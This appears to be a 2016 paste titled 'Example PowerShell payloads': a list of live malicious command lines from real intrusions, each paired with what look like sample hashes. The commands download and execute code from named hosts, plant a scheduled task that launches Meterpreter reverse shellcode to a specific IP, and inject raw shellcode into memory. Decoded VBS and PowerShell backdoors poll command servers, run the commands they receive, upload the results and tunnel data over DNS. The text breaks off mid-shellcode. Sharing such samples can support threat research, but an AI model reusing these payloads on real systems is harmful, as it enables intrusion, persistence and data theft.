
Example PowerShell payloads

a guest Sep 10th, 2016 3,936 Never
  1. C:\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://aclawgroup.com.au/2.zip','C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip').Items(),16)
  2. 1b3e9347bafbe2e5a85f2a377d457c4b52fd404856ed5d260cd9619efd61331f
  3. 1cad7f77f76962ccfff9d0b25a0cf87d1351d9a8cdeafed417184659427f5ce3
  4. 29f930c333d3aa4bb8a81f0bb87a0f01cc2fec42920ca158270ad4f962f51d7c
  5. 2b5d4eed392f00c194c8305a3a007afe6dcff72c0f0b7697f5e157f54e50516f
  6. 32d569393336fef91c473c2743bf217e897374a255db191763b6de9a40ad7ca6
  7. 345c99969bc832bd6b7e2a12f7d5d65af9c8a3e06eb6175bf3dc9bf04f81f353
  8. 383006ae243bf62bea091cf599b451ef32f4e331e548ee7466ce664a9a4f395a
  9. 39d32398d4370e4833abfa42f1dda68449221f34c56f5dc6750288a7bef472a6
  10. 4c1826947e8dc6878b12212281d0dae7c63f25244aa161beb754dea16376967c
  11. 617bd95470f2c3d200534f4b4d1f2d49a72e5b91075ac3308e573a65a7669737
  12. 8342bd5b9523814c5774d28310e4dd193ddb6809f1b03b5afe23de0df002ba39
  13. a82745625ff27b8727b0a761ab40e7759ca8e8c6da267dc3adf54c969b4b468e
  14. a935116d2ec04f86b9c1c5b3787cee0c64aaba7d594a0e8199f01ae89549910f
  15. baca929fa67248227d20d57905778fac8320feee1c691b775c869c11aa75556c
  16. f1f34d805dd1d92373725812f05b5c83cb573d3958166655ba0d391d45f56345
  17. C:\Windows\system32\schtasks.exe  /create /TN update_google /TR "powershell.exe -ep Bypass -WindowStyle hidden -noexit -c 'IEX ((New-Object Net.WebClient).DownloadString('''''))'; Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 115.70.184.41 -Lport 4445 -Force" /SC onidle /i 2
  18. 1c67973f7d76f608900db685e42831f79a892bc9c99837f748f473a0900f7579
  19. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -enc 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 --> $08Q = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $08Q -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xda,0xce,0xb8,0x97,0x02,0xfe,0x68,0xd9,0x74,0x24,0xf4,0x5b,0x31,0xc9,0xb1,0x71,0x31,0x43,0x17,0x83,0xeb,0xfc,0x03,0xd4,0x11,0x1c,0x9d,0x26,0xfd,0x69,0x5e,0xd6,0xfe,0x09,0xd6,0x33,0xcf,0x1b,0x8c,0x30,0x62,0xac,0xc6,0x14,0x8f,0x47,0x8a,0x8c,0x04,0x25,0x03,0xa3,0xad,0x80,0x75,0x8a,0x2e,0x25,0xba,0x40,0xec,0x27,0x46,0x9a,0x21,0x88,0x77,0x55,0x34,0xc9,0xb0,0x8b,0xb7,0x9b,0x69,0xc0,0x6a,0x0c,0x1d,0x94,0xb6,0x2d,0xf1,0x93,0x87,0x55,0x74,0x63,0x73,0xec,0x77,0xb3,0x2c,0x7b,0x3f,0x2b,0x46,0x23,0xe0,0x4a,0x8b,0x37,0xdc,0x05,0xa0,0x8c,0x96,0x94,0x60,0xdd,0x57,0xa7,0x4c,0xb2,0x69,0x08,0x41,0xca,0xae,0xae,0xba,0xb9,0xc4,0xcd,0x47,0xba,0x1e,0xac,0x93,0x4f,0x83,0x16,0x57,0xf7,0x67,0xa7,0xb4,0x6e,0xe3,0xab,0x71,0xe4,0xab,0xaf,0x84,0x29,0xc0,0xcb,0x0d,0xcc,0x07,0x5a,0x55,0xeb,0x83,0x07,0x0d,0x92,0x92,0xed,0xe0,0xab,0xc5,0x49,0x5c,0x0e,0x8d,0x7b,0x89,0x28,0xcc,0x13,0x23,0x50,0x9b,0xe3,0xd3,0xed,0x0a,0x8d,0x4a,0x9b,0x2b,0x05,0xe5,0xd7,0xc4,0x83,0xf2,0x18,0xff,0xfa,0x03,0xb1,0x57,0xab,0xac,0x68,0x30,0x69,0x05,0xec,0x67,0x72,0x7c,0xe5,0x08,0xd7,0x4e,0x33,0x99,0xb6,0xda,0xc0,0x4b,0x69,0x71,0x97,0x38,0xd9,0xed,0x40,0x36,0x46,0x2b,0x91,0x9d,0x93,0xfb,0x37,0x2f,0xb1,0x56,0xa0,0x4f,0x07,0x37,0xb4,0x02,0x35,0xe5,0xe5,0xf0,0xe9,0x61,0xed,0xa0,0x27,0x49,0x0e,0x9f,0xbe,0x6b,0x9a,0x30,0x9b,0x1b,0xdb,0x02,0x1b,0xdc,0x52,0x84,0x71,0xd
8,0x34,0x2f,0x9a,0xb6,0xdc,0xda,0xe2,0xa8,0x9b,0xda,0x3f,0xe5,0x5c,0x73,0xe8,0x51,0xf4,0x2a,0x7e,0x73,0xfc,0xca,0x05,0x74,0xd5,0x6e,0x39,0xff,0xf8,0x3b,0xb6,0x84,0x8e,0xbc,0xc8,0x84,0x7b,0x6d,0x21,0x1c,0x7b,0x8e,0xb1,0xf5,0xd0,0x71,0x4e,0xfa,0x06,0xe3,0xdf,0x61,0x2c,0x97,0x7a,0x19,0xe1,0x14,0xf2,0xb4,0x8e,0xf5,0x94,0x32,0x1a,0x6f,0x1a,0xd5,0xb9,0x03,0xf4,0x4c,0x3a,0xb9,0x08,0x64,0xd1,0x70,0xc8,0x25,0x76,0x19,0xca,0xb3,0x74,0x8d,0xa0,0x41,0x13,0x2f,0x63,0x2e,0x39,0xd9,0x51,0xe1,0x42,0xf3,0xf6,0xcf,0x7c,0x9a,0x40,0x2b,0x7e,0x4a,0x74,0x60,0x0d,0xc0,0x50,0x81,0x3c,0x19,0x2c,0x92,0x6e,0xc8,0x1a,0xfd,0x9c,0x7c,0x2b,0x1f,0x5f,0x55,0xae,0x20,0xd4,0x7b,0xe8,0x25,0xd5,0xf0,0x1e,0x4c,0xd6,0xac,0x4e,0x1d,0x92,0x68,0x62,0x4d,0x48,0x19,0x57,0x3a,0xc0,0x82,0x58,0x11,0x9f,0xd9,0xa2,0x71,0x6e,0x72,0xc2,0x43,0xf9,0xf2,0x40,0xb3,0xd3,0x97,0x64,0x1c,0xb4,0x56,0xef,0xcd,0xc3,0x66,0x3a,0x7b,0xcc,0xf0,0x34,0xc9,0x6e,0x56,0x4b,0xe7,0x87,0xc7,0x4c,0xf7,0xa7,0x96,0x9c,0x78,0x36,0x00,0xe0,0x90,0x38,0x30,0x1f,0x9f,0xae,0xbf,0xba,0x0d,0x58,0x2b,0x6a,0xbd,0xf1,0xab;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$QWjc=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($QWjc.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$QWjc,0,0,0);for (;;){Start-sleep 60};
  20. a933fc234397ed08151cd7578ee649db47e9a4585b572b5a9185fef34444beb7
  21. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "  &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZHOSTNAME4-WIN81' + $rn; $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' $f; (Get-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs') -replace '__',('HTP'+$id) |  Set-Content  'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' ; $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' $fdn; (Get-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1') -replace '__',('DN'+$id) |  Set-Content  'C:\Users\User1\AppData\Local\Microsoft\Media\dn.ps1' ;} "  --> Set wss = CreateObject("W__Script.S__hell")HOME = CreateObject("Scripting.FileSystemObject").GetParentFolderName(WScript.ScriptFullName) & "\" '"%userprofile%\AppData\Local\Microsoft\Media\"SERVER="http://178.33.94.47:2050/update.php?req=__"Dwn= "powershell "" " & _     " &{$wc=(new-object System.Net.WebClient); " & _      "while(1){try{$r=Get-Random ;$wc.DownloadFile('" _     & SERVER & _     "&m=d','" & HOME & "dn\'+$r+'.-_');" & _     " Rename-Item -path ('"  & _      HOME & _      "dn\'+$r+'.-_') -newname " & _       "($wc.ResponseHeaders['Content-Disposition'].Substring(" & _      "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9))}catch{break}}}"""wss.Run Replace(Dwn,"-_","dwn"),0DownloadExecute= "powershell "" " & _                 "&{$r=Get-Random; "& _                 "$wc=(new-object System.Net.WebClient);" & _                  "$wc.DownloadFile('" & SERVER & "&m=b','" & HOME&"dn\'+$r+'.-_');" & _                 "Invoke-Expression ('"& HOME&"dn\'+$r+'.-_ >" & HOME&"up\'+$r+'-_');" & _                 "Rename-Item -path ('" & HOME & _                 
"up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring(" & _                  "$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9)+'.txt');" & _                 "Get-ChildItem " & HOME & "up\ | ForEach-Object "& _                 "{if((Get-Item($_.FullName)).length -gt 0){$wc.UploadFile('" & _                 SERVER & _                 "&m=u',$_.FullName)};" & _                 "Remove-Item $_.FullName};Remove-Item ('"& HOME & "dn\'+$r+'.-_')}"""wss.Run Replace(DownloadExecute,"-_","bat"),0dnsCmd = "powershell -executionpolicy bypass -file " & HOME & "dn.ps1"wss.Run dnsCmd,0
  22. 55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579
  23. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Add-Content 'C:\Users\Public\Libraries\update.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Add-Content 'C:\Users\Public\Libraries\dns.ps1' $f;(Get-Content $env:Public\Libraries\update.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\update.vbs}" --> HOME="%public%\Libraries\"SERVER="http://winodwsupdates.me/counter.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_'); Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte; Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring($wc.ResponseHeaders['Content-Disposition'].IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_'); Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte; Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_'); Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring($wc.ResponseHeaders['Content-Disposition'].IndexOf('filename=')+9)+'.txt'); Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String((Get-Content -Path $_.FullName -Encoding Byte)) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 
3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"dns.ps1"CreateObject("W__Script.S__hell").Run DnsCmd,0
  24. 9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777
  25. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Set-Content 'C:\Users\Public\Libraries\fireeye.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLmdvb2dsZXVwZGF0ZS5kb3dubG9hZCcKJGdsb2JhbDpmaWxlbmFtZSA9ICcnCiRnbG9iYWw6bXlmbGFnID0gMAokZ2xvYmFsOm15aWQgPSAnIyMjJwokZ2xvYmFsOm15aG9tZSA9ICIkZW52OlB1YmxpY1xMaWJyYXJpZXNcIgpmdW5jdGlvbiBjb252ZXJ0VG8tQmFzZTM2ICgkZGVjTnVtPSIiKQp7CiAgICAkZGVjTnVtICU9IDQ2NjU2CiAgICAkYWxwaGFiZXQgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIgogICAgZG8KICAgIHsKICAgICAgICAkcmVtYWluZGVyID0gKCRkZWNOdW0gJSAzNikKICAgICAgICAkY2hhciA9ICRhbHBoYWJldC5zdWJzdHJpbmcoJHJlbWFpbmRlciwxKQogICAgICAgICRiYXNlMzZOdW0gPSAiJGNoYXIkYmFzZTM2TnVtIgogICAgICAgICRkZWNOdW0gPSAoJGRlY051bSAtICRyZW1haW5kZXIpIC8gMzYKICAgIH0KICAgIHdoaWxlICgkZGVjTnVtIC1ndCAwKQogICAgJGJhc2UzNk51bS5QYWRMZWZ0KDMsJzAnKQp9CmZ1bmN0aW9uIEdldFN1YigkbXlmbGFnMiwgJGNtZGlkPScwMCcsICRwYXJ0aWQ9JzAwMCcpCnsKICAgIGlmKCRteWZsYWcyIC1lcSAwKQogICAgewogICAgKCd3dzAwMDAwMCcrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKQogICAgfQogICAgZWxzZWlmKCRteWZsYWcyIC1lcSAxKQogICAgewogICAgICAgICgnd3cnKyRnbG9iYWw6bXlpZCsnMDAwMDAnKyhjb252ZXJ0VG8tQmFzZTM2KEdldC1SYW5kb20gLU1heGltdW0gNDY2NTUpKSkKICAgIH0KICAgIGVsc2VpZigkbXlmbGFnMiAtZXEgMikKICAgIHsKICAgICAgICAoJ3d3JyskZ2xvYmFsOm15aWQrJGNtZGlkKyRwYXJ0aWQrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKQogICAgfQp9CmZ1bmN0aW9uIFN0cjJIZXgoJG15c3RyKQp7CiAgICBbU3lzdGVtLkJpdENvbnZlcnRlcl06OlRvU3RyaW5nKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQuR2V0Qnl0ZXMoJG15c3RyKSkuUmVwbGFjZSgiLSIsICIiKQp9CmZ1bmN0aW9uIEFsaXZlCnsKCWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpCgl7CgkJcmV0dXJuIDAKCX0KICAgIFNlbmRSZWNlaXZlRE5TICgoR2V0U3ViIDEpKyczMCcpCiAgICAkc3ViID0gKChHZXRTdWIgMSkrJzIzMkEnKSArIChTdHIySGV4ICRnbG9iYWw6ZmlsZW5hbWUpCiAgICAkaSA9IDEKICAgICRyZXQgPSAwCiAgICB3aGlsZSgkZ2xv
YmFsOm15ZmxhZyAtZXEgMSkKICAgIHsKICAgICAgICAkcmV0ID0gMQogICAgICAgICRzdWIyID0gJHN1YiArIChTdHIySGV4ICRpKQogICAgICAgIFNlbmRSZWNlaXZlRE5TICRzdWIyCiAgICAgICAgJGkrKwogICAgfQogICAgaWYoJHJldCAtZXEgMSkKICAgIHsKICAgICAgICBGaXhCYXRGaWxlICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IikKICAgIH0KICAgICRyZXQKfQpmdW5jdGlvbiBTZW5kUmVjZWl2ZUROUyAoJGQpCnsKCSRjbnQgPSAwCgl3aGlsZSAoJGNudCAtbHQgMjApCgl7CgkJdHJ5CgkJewoJCQkkbXlkYXRhID0gKFtTeXN0ZW0uTmV0LkROU106OkdldEhvc3RCeU5hbWUoJGQrJGdsb2JhbDpteWhvc3QpLkFkZHJlc3NMaXN0WzBdKQoJCQkkbXlkYXRhID0gKCRteWRhdGEgfCBGb3JFYWNoLU9iamVjdCB7JF8uSVBBZGRyZXNzVG9TdHJpbmd9KQoJCQkkY250ID0gMjUKCQl9CgkJY2F0Y2gKCQl7CgkJCVN0YXJ0LVNsZWVwIC1tIDUwMAoJCQkkY250KysKCQl9Cgl9CiAgICBpZigtbm90KCRjbnQgLWVxIDI1KSkKICAgIHsKICAgICAgICAoJyMnKycjIycpCiAgICB9CiAgICBlbHNlaWYoJGdsb2JhbDpteWZsYWcgLWVxIDAgLWFuZCAkbXlkYXRhLlN0YXJ0c1dpdGgoJzMzLjMzLicpKQogICAgewogICAgICAgICR0bXAgPSAkbXlkYXRhLlN1YlN0cmluZyg2KS5TcGxpdCgnLicpCiAgICAgICAgJGdsb2JhbDpmaWxlbmFtZSA9IChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pCiAgICAgICAgJGdsb2JhbDpteWZsYWcgPSAxCiAgICB9CiAgICBlbHNlaWYgKCRteWRhdGEuRXF1YWxzKCczNS4zNS4zNS4zNScpKQogICAgewogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMAogICAgfQogICAgZWxzZWlmICgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkKICAgIHsKICAgICAgICAkdG1wID0gJG15ZGF0YS5TcGxpdCgnLicpCiAgICAgICAgW1N5c3RlbS5JTy5GaWxlXTo6QXBwZW5kQWxsVGV4dCgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKyIuYmF0IiwgKChbY2hhcl0gW2ludF0gJHRtcFswXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbMV0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzJdKSArIChbY2hhcl0gW2ludF0gJHRtcFszXSkpKQogICAgfQogICAgZWxzZWlmKCRnbG9iYWw6bXlpZCAtZXEgJyMnKycjIycpCiAgICB7CiAgICAgICAgKFtjaGFyXSBbaW50XSAkbXlkYXRhLlNwbGl0KCcuJylbMF0pCiAgICB9Cn0KZnVuY3Rpb24gRml4QmF0RmlsZSAoJGJhdHBhdGgpCnsKICAgIChHZXQtQ29udGVudCAkYmF0cGF0aCkuU3Vic3RyaW5nKDEwKSB8IFNldC1Db250ZW50ICRiYXRwYXRoCn0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpCnsKICAgICRteUZpbGVOYW1lID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0RmlsZU5hbWVXaXRob3V0RXh0ZW5zaW9uKCRteUZpbGVQYXRoKQogICAgJG15c3RyID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbFRl
eHQoJG15RmlsZVBhdGgpCiAgICAkaT0wCiAgICAkbXl0ZW1wID0gJycKICAgICRqPTAKICAgIHdoaWxlKCRpIC1sZSAkbXlzdHIuTGVuZ3RoKQogICAgewogICAgICAgICRteXRlbXAgKz0gJG15c3RyWyRpXQogICAgICAgIGlmKCgoJGklMjQpIC1lcSAyMykgLW9yICgkaSAtZXEgJG15c3RyLkxlbmd0aCkpCiAgICAgICAgewogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXAKICAgICAgICAgICAgU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMiAkbXlGaWxlTmFtZSAoY29udmVydFRvLUJhc2UzNiAkaikpICsgJG15aGV4KQogICAgICAgICAgICAkaisrCiAgICAgICAgICAgICRteXRlbXAgPSAnJwogICAgICAgIH0KICAgICAgICAkaSsrCiAgICB9Cn0KZnVuY3Rpb24gR2V0SUQKewogICAgJGdsb2JhbDpteWlkID0gU2VuZFJlY2VpdmVETlMgKChHZXRTdWIgMCkrJzMwJykKfQpmdW5jdGlvbiBDaGFuZ2VUaGlzRmlsZSAoJGJvdGlkKQp7CgkoR2V0LUNvbnRlbnQgJGVudjpQdWJsaWNcTGlicmFyaWVzXGZpcmVleWUucHMxKSAtcmVwbGFjZSAoJyMnKycjIycpLCRib3RpZCB8IFNldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xmaXJlZXllLnBzMQp9CmZ1bmN0aW9uIEluaXQKewogICAgaWYoJGdsb2JhbDpteWlkIC1lcSAoJyMnKycjIycpKQogICAgewoJCW1kIC1Gb3JjZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcpCgkJR2V0SUQKCQlDaGFuZ2VUaGlzRmlsZSAkZ2xvYmFsOm15aWQKICAgIH0KfQpmdW5jdGlvbiBtYWluCnsKICAgIEluaXQKICAgIGlmKEFsaXZlIC1lcSAxKQogICAgewogICAgICAgIEludm9rZS1FeHByZXNzaW9uICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycuYmF0ID4gJyskZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycudHh0JykKICAgICAgICBTZW5kRmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsnLnR4dCcpCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQnKQogICAgICAgIFJlbW92ZS1JdGVtICgkZ2xvYmFsOm15aG9tZSsndHBcJyskZ2xvYmFsOmZpbGVuYW1lKycudHh0JykKICAgIH0KfQptYWlu')); Set-Content 'C:\Users\Public\Libraries\fireeye.ps1' $f;(Get-Content $env:Public\Libraries\fireeye.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\fireeye.vbs}" --> HOME="%public%\Libraries\"SERVER="http://googleupdate.download/update-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft 
BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object {if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0DnsCmd="powershell -ExecutionPolicy Bypass -File "&HOME&"fireeye.ps1"CreateObject("W__Script.S__hell").Run DnsCmd,0
  26. bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9
  27. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Set-Content 'C:\Users\Public\Libraries\komisova.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Set-Content 'C:\Users\Public\Libraries\komisova.ps1' $f;(Get-Content $env:Public\Libraries\komisova.vbs) -replace '__',(Get-Random) | Set-Content $env:Public\Libraries\komisova.vbs}" --> HOME="%public%\Libraries\"SERVER="http://googleupdate.download/update-index.aspx?req=__\"Dwn="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');while(1){try{$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"dn\'+$r+'.-_') -newname ($cd.Substring($cd.IndexOf('filename=')+9))}catch{break}}}"""CreateObject("W__Script.S__hell").Run Replace(Dwn,"-_","dwn"),0DownloadExecute="powershell ""&{$wc=(new-object System.Net.WebClient);$wc.UseDefaultCredentials=$true;$wc.Headers.add('Accept','*/*');$wc.Headers.add('User-Agent','Microsoft BITS/7.7');$r=Get-Random;$wc.DownloadFile('"&SERVER&"-_&m=d','"&HOME&"dn\'+$r+'.-_');Set-Content -Path ('"&HOME&"dn\'+$r+'.-_') -Value ([System.Convert]::FromBase64String((Get-Content -Path ('"&HOME&"dn\'+$r+'.-_')))) -Encoding Byte;Invoke-Expression ('"&HOME&"dn\'+$r+'.-_ >"&HOME&"up\'+$r+'-_');$cd=$wc.ResponseHeaders['Content-Disposition'];Rename-Item -path ('"&HOME&"up\'+$r+'-_') -newname ($cd.Substring(($cd.IndexOf('filename=')+9),($cd.Length-25))+'.bat.txt');Get-ChildItem "&HOME&"up\ | ForEach-Object 
{if((Get-Item ($_.FullName)).length -gt 0){[System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($_.FullName))) | Out-File $_.FullName;$wc.UploadFile('"&SERVER&"upl&m=u',$_.FullName);waitfor haha /T 3};Remove-Item $_.FullName};Remove-Item ('"&HOME&"dn\'+$r+'.-_')}"""CreateObject("W__Script.S__hell").Run Replace(DownloadExecute,"-_","bat"),0komc="powershell -exec Bypass -File "&HOME&"komisova.ps1"CreateObject("W__Script.S__hell").Run komc,0
  28. eab4489c2b2a8dcb0f2b4d6cf49876ea1a31b37ce06ab6672b27008fd43ad1ca
  29. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command iex (New-Object system.Net.WebClient).DownloadString(\""https://goo.gl/11XkCQ\"");Invoke-Shellcode -Force -Shellcode 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0x5,0x68,0xc0,0xa8,0x11,0x81,0x68,0x2,0x0,0